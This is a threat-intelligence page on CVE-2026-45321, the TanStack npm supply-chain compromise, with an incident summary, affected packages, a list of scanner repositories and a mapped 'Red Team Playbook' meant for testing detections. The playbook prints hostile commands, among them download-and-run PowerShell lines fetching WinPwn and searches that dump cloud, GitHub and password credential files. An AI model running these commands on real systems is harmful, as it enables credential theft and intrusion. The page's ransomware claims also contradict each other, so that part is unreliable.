CVE-2026-45321

CRITICAL CISA KEV POC TTE 15d Pub 12/05 Upd 28/05

Overview

This vulnerability is a supply chain compromise involving a chained exploitation of misconfigurations and memory extraction vulnerabilities within GitHub Actions workflows. The root cause includes a pull_request_target misconfiguration allowing elevated access, cache poisoning across fork-to-base trust boundaries, and runtime memory extraction of OIDC tokens from the Actions runner process. The affected component is the npm publishing process for @tanstack/* packages, specifically the trusted-publisher binding in GitHub Actions for TanStack/router, which enabled unauthorized publishing of malicious package versions.

Vulnerability Description

On 2026-05-11, between approximately 19:20 and 19:26 UTC, 84 malicious versions across 42 @tanstack/* packages were published to the npm registry. The publishes were authenticated via the legitimate GitHub Actions OIDC trusted-publisher binding for TanStack/router, but the publish workflow itself was not modified. The attacker chained three known vulnerability classes — a pull_request_target "Pwn Request" misconfiguration, GitHub Actions cache poisoning across the fork↔base trust boundary, and runtime memory extraction of the OIDC token from the Actions runner process — to publish credential-stealing malware under a trusted identity. Each affected package received exactly two malicious versions, published a few minutes apart.

Impact

An unauthenticated attacker was able to publish credential-stealing malware under a trusted identity to widely used npm packages, enabling supply chain compromise. This allows attackers to distribute malicious code to downstream users and systems relying on these packages, potentially leading to widespread credential theft and further compromise. No user interaction was required beyond installing the affected package versions, exposing organizations to large-scale data breaches and trust erosion in software dependencies.

Solution

Refer to the TanStack security advisory GHSA-g7cv-rxg3-hmpx for detailed remediation steps. Users should upgrade affected packages to versions released after 1.166.15 for arktype-adapter and 1.161.12 for eslint-plugin-router, as well as updated versions of eslint-plugin-start beyond 0.0.4. The advisory and TanStack's postmortem blog provide comprehensive instructions on patching and mitigating the GitHub Actions workflow misconfiguration exploited in this incident.

EPSS vs KEV Prediction — Evolution (30 days)

Overview

Analysis generation failed

Threat Summary

Analysis generation failed

Full Analysis

The vulnerability in question arises from a sophisticated exploitation of the npm registry, specifically targeting multiple packages associated with the TanStack ecosystem. This incident involved the publication of malicious versions of legitimate packages, leveraging a combination of known vulnerabilities. The attack exploited a misconfiguration in the GitHub Actions workflow, particularly the pull_request_target event, which allowed the attacker to execute arbitrary code within the context of the repository. This misconfiguration, coupled with cache poisoning across the trust boundary between forks and bases, enabled the attacker to manipulate the build environment. Furthermore, the extraction of the OpenID Connect (OIDC) token from the Actions runner process facilitated the publication of these malicious packages under a trusted identity, significantly complicating detection efforts.

Attack vectors for this vulnerability are multifaceted. The initial vector involves the misuse of the pull_request_target event, which is intended to allow workflows to run in the context of the base repository. However, when improperly configured, it can allow untrusted code to execute with elevated privileges. The attacker exploited this by chaining it with cache poisoning techniques, which involved manipulating the cached dependencies to include malicious payloads. The final step in this exploitation chain was the extraction of sensitive tokens from the Actions runner, which provided the necessary credentials to publish the compromised packages. This sequence of events illustrates a well-orchestrated attack that can be replicated by other malicious actors if similar configurations are present in other repositories.

The real-world impact of this vulnerability is significant, particularly for organizations that rely on the affected TanStack packages. The malicious versions of these packages were designed to steal credentials, potentially leading to unauthorized access to sensitive systems and data. The risk extends beyond immediate financial loss; compromised credentials can facilitate lateral movement within an organization's network, leading to broader security breaches. Additionally, the reputational damage associated with a successful attack can deter customers and partners, resulting in long-term business implications. Organizations using these packages may face compliance issues if sensitive data is exposed, further compounding the risks.

Detection and mitigation strategies are critical in addressing this vulnerability. Organizations should implement strict monitoring of their package dependencies, utilizing tools that can identify and alert on unauthorized changes or publications in their dependency trees. Regular audits of GitHub Actions workflows are essential to ensure that configurations adhere to security best practices, particularly regarding the use of pull_request_target events. Employing least privilege principles when configuring workflows can minimize the risk of exploitation. Furthermore, organizations should consider implementing automated security checks as part of their CI/CD pipelines to detect potential vulnerabilities before code is merged or deployed. Educating development teams about secure coding practices and the implications of misconfigurations can also significantly reduce the likelihood of similar attacks.

In conclusion, the vulnerability affecting the TanStack packages exemplifies the evolving landscape of software supply chain attacks. By exploiting known vulnerabilities in configuration and trust boundaries, attackers can introduce malicious code into widely used libraries, posing severe risks to organizations. A proactive approach to security, encompassing continuous monitoring, strict access controls, and education, is essential to mitigate the risks associated with such vulnerabilities and protect organizational assets from potential exploitation.




CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2026-45321, evidenced by the emergence of multiple new proof-of-concept exploits publicly available on GitHub. This development coincides with the vulnerability’s recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring its recognition as a critical risk by federal cybersecurity authorities. Our telemetry indicates a significant uptick in detection signals associated with this supply chain compromise, reflecting growing adversary interest and operationalization. The Elevation of Privilege and Remote Code Execution potential inherent in this vulnerability, combined with its exploitation by ransomware actors as noted in the KEV advisory, substantially amplifies the threat landscape. Consequently, the risk level for organizations relying on affected @tanstack packages has escalated to critical, necessitating heightened vigilance. The increased EPSS score and rapid upward trend further validate the urgency and likelihood of exploitation attempts in the near term.



Update 2 — June 15, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation attempts related to CVE-2026-45321, as evidenced by a significant uptick in detection activity across multiple telemetry sources. Despite a notable decline in the EPSS score, indicating a reduced probability of widespread exploitation in the immediate term, the surge in observed adversary actions suggests increasing operationalization of this vulnerability within targeted campaigns. The persistence of ransomware actors leveraging this flaw underscores its continued attractiveness as an attack vector, particularly given the complex supply chain compromise involving authenticated GitHub Actions workflows. This divergence between EPSS trends and real-world exploitation signals a nuanced threat environment where opportunistic adversaries are refining tactics to bypass existing defenses. Consequently, the overall threat level remains critical, with defenders advised to maintain heightened situational awareness as exploitation attempts become more frequent and sophisticated.

Affected Products (343)

Vendor Product Version CPE
abhishake1 Abhishake1 Supersurkhet\/cli 0.0.2 cpe:2.3:a:abhishake1:supersurkhet\/cli:0.0.2:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Supersurkhet\/cli 0.0.3 cpe:2.3:a:abhishake1:supersurkhet\/cli:0.0.3:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Supersurkhet\/cli 0.0.4 cpe:2.3:a:abhishake1:supersurkhet\/cli:0.0.4:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Supersurkhet\/cli 0.0.5 cpe:2.3:a:abhishake1:supersurkhet\/cli:0.0.5:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Supersurkhet\/cli 0.0.6 cpe:2.3:a:abhishake1:supersurkhet\/cli:0.0.6:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Supersurkhet\/cli 0.0.7 cpe:2.3:a:abhishake1:supersurkhet\/cli:0.0.7:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Supersurkhet\/sdk 0.0.2 cpe:2.3:a:abhishake1:supersurkhet\/sdk:0.0.2:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Supersurkhet\/sdk 0.0.3 cpe:2.3:a:abhishake1:supersurkhet\/sdk:0.0.3:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Supersurkhet\/sdk 0.0.4 cpe:2.3:a:abhishake1:supersurkhet\/sdk:0.0.4:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Supersurkhet\/sdk 0.0.5 cpe:2.3:a:abhishake1:supersurkhet\/sdk:0.0.5:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Supersurkhet\/sdk 0.0.6 cpe:2.3:a:abhishake1:supersurkhet\/sdk:0.0.6:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Supersurkhet\/sdk 0.0.7 cpe:2.3:a:abhishake1:supersurkhet\/sdk:0.0.7:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Taskflow-Corp\/cli 0.1.24 cpe:2.3:a:abhishake1:taskflow-corp\/cli:0.1.24:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Taskflow-Corp\/cli 0.1.25 cpe:2.3:a:abhishake1:taskflow-corp\/cli:0.1.25:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Taskflow-Corp\/cli 0.1.26 cpe:2.3:a:abhishake1:taskflow-corp\/cli:0.1.26:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Taskflow-Corp\/cli 0.1.27 cpe:2.3:a:abhishake1:taskflow-corp\/cli:0.1.27:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Taskflow-Corp\/cli 0.1.28 cpe:2.3:a:abhishake1:taskflow-corp\/cli:0.1.28:*:*:*:*:node.js:*:*
abhishake1 Abhishake1 Taskflow-Corp\/cli 0.1.29 cpe:2.3:a:abhishake1:taskflow-corp\/cli:0.1.29:*:*:*:*:node.js:*:*
agentworkhq Agentworkhq Agentwork-Cli 0.1.4 cpe:2.3:a:agentworkhq:agentwork-cli:0.1.4:*:*:*:*:node.js:*:*
agentworkhq Agentworkhq Agentwork-Cli 0.1.5 cpe:2.3:a:agentworkhq:agentwork-cli:0.1.5:*:*:*:*:node.js:*:*
+323 additional CPEs
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

GitHub PoCs (13)

Repository Author Stars Forks Date Link
fabriziosalmi/tanstack-compromise-checker
Shell script to detect TanStack npm supply chain attack indicators (CVE-2026-45321 / GHSA-g7cv-rxg3-hmpx)
fabriziosalmi 2 0 2026-05-16 View
qi-scape/scan-shai-hulud
Detect CVE-2026-45321 Mini Shai-Hulud supply chain compromise — scans for 170 npm + 2 PyPI poisoned packages across TanS...
qi-scape 1 1 2026-05-12 View
Intrudify/mini-shai-hulud-scanner
Scanner for the Mini Shai-Hulud npm/PyPI supply chain worm (NHS CC-4781 · CVE-2026-45321). Detects gh-token-monitor pers...
Intrudify 2 0 2026-05-13 View
nkopylov/tanscript-exploit-check
IOC checker for the TanStack/Mini Shai-Hulud npm supply chain attack (CVE-2026-45321)
nkopylov 1 0 2026-05-18 View
shayr1/shai-hulud-scan
Claude Code skill to scan machines for Mini Shai-Hulud (CVE-2026-45321) supply chain worm IOCs
shayr1 1 0 2026-05-12 View
7whyex/CVE-2026-45321-Tanstack
7whyex 0 0 2026-06-25 View
adriannurrr/CVE-2026-45321-Tanstack
adriannurrr 0 0 2026-06-21 View
ry-allan/tanstack-compromise-checker
Detects CVE-2026-45321 (TanStack supply chain compromise) and Mini Shai-Hulud worm artifacts. Scans node_modules, lockfi...
ry-allan 0 0 2026-05-12 View
Yomisana/are-you-get-tanstack-attack
Are you get Tanstack Supply chain attack attack of 5/11? CVE-2026-45321 / GHSA-g7cv-rxg3-hmpx
Yomisana 0 0 2026-05-12 View
Caixa-git/tanstack-shield
🛡️ One-command scanner for CVE-2026-45321 — TanStack npm supply-chain attack
Caixa-git 0 0 2026-05-12 View
digi4care/shai-scan
Zero-dependency CLI scanner for npm/PyPI supply chain compromises. Detects compromised packages in lockfiles and system-...
digi4care 0 0 2026-05-16 View
prashanthnataraj/mini-shai-hulud-detector
One-command scanner for the Mini Shai-Hulud npm supply-chain worm (CVE-2026-45321). Detect before rotating tokens.
prashanthnataraj 0 0 2026-05-20 View
renewablehacking/CVE-2026-45321-Tanstack
renewablehacking 0 0 2026-05-25 View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

15 events
2026-07-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-27
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2026-05-27
Detected as Exploited in the Wild

Active exploitation confirmed — vendor: TanStack, product: TanStack

2026-05-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-21
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-12
PoC Published (13 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Authentication Bypass
64% auth_bypass
Remote Code Execution
32% rce

MITRE ATT&CK Techniques (7)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1195.001 Compromise Software Dependencies and Development Tools Initial Access initial-access Linux, macOS, Windows
T1195.002 Compromise Software Supply Chain Initial Access initial-access Linux, Windows, macOS
T1059 Command and Scripting Interpreter Kill Chain execution ESXi, IaaS, Identity Provider, Linux, macOS, Network Devices, Office Suite, Windows
T1542.001 System Firmware Kill Chain persistence, defense-evasion Windows, Network Devices
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1046 Network Service Discovery Kill Chain discovery Containers, IaaS, Linux, macOS, Network Devices, Windows
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-442 Infected Software
30%
Medium High
CAPEC-448 Embed Virus into DLL
30%
Medium High
CAPEC-636 Hiding Malicious Data or Code within Files
30%
High

Red Team Playbook

34 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1046 Network Service Discovery for Containers containers Shell
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and...
Command (Shell)
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
T1046 Port Scan Linux, macOS Bash
Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
Command (Bash)
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
T1046 Port Scan NMap for Windows Windows PowerShell Privileged
Scan ports to check for listening ports for the local host 127.0.0.1
Command (PowerShell)
nmap #{host_to_scan}
T1046 Port Scan Nmap Linux, macOS Shell Privileged
Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
Command (Shell)
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
T1046 Port Scan using nmap (Port range) Linux, macOS Shell Privileged
Scan multiple ports to check for listening ports with nmap
Command (Shell)
nmap -Pn -sV -p #{port_range} #{host}
T1046 Port Scan using python Windows PowerShell
Scan ports to check for listening ports with python
Command (PowerShell)
python "#{filename}" -i #{host_ip}
T1046 Port-Scanning /24 Subnet with PowerShell Windows PowerShell
Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask. The connection attempts to use a timeout parameter in...
Command (PowerShell)
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}
T1046 Remote Desktop Services Discovery via PowerShell Windows PowerShell Privileged
Availability of remote desktop services can be checked using get- cmdlet of PowerShell
Command (PowerShell)
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
T1046 WinPwn - MS17-10 Windows PowerShell
Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
T1046 WinPwn - bluekeep Windows PowerShell
Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
T1046 WinPwn - fruit Windows PowerShell
Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
T1046 WinPwn - spoolvulnscan Windows PowerShell
Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
T1059 AutoIt Script Execution Windows PowerShell
An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
Command (PowerShell)
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
T1195.002 Simulate npm package installation on a Linux system containers, Linux Bash
Launches a short‑lived Kubernetes pod using the Node 18 image, initializes a minimal npm project in /tmp/test, and installs the specified npm package without audit/fund/package‑lock options, simulating potentially suspicious package retrieval (e.g., typosquatting/dependency...
Command (Bash)
kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"
T1542.001 UEFI Persistence via Wpbbin.exe File Creation Windows PowerShell Privileged
Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms. - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c -...
Command (PowerShell)
echo "Creating %systemroot%\wpbbin.exe"      
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (6)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2026-45321
github.com
GitHub CVE x_refsource_CONFIRM
https://github.com/TanStack/router/security/advisories/GHSA-g7cv-rxg3-hmpx
github.com
GitHub CVE x_refsource_MISC
https://github.com/TanStack/router/issues/7383
tanstack.com
GitHub CVE x_refsource_MISC
https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
stepsecurity.io
GitHub CVE x_refsource_MISC
https://www.stepsecurity.io/blog/mini-shai-hulud-is-back-a-self-spreading-supply-chain-attack-hits-the-npm-ecosystem
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-45321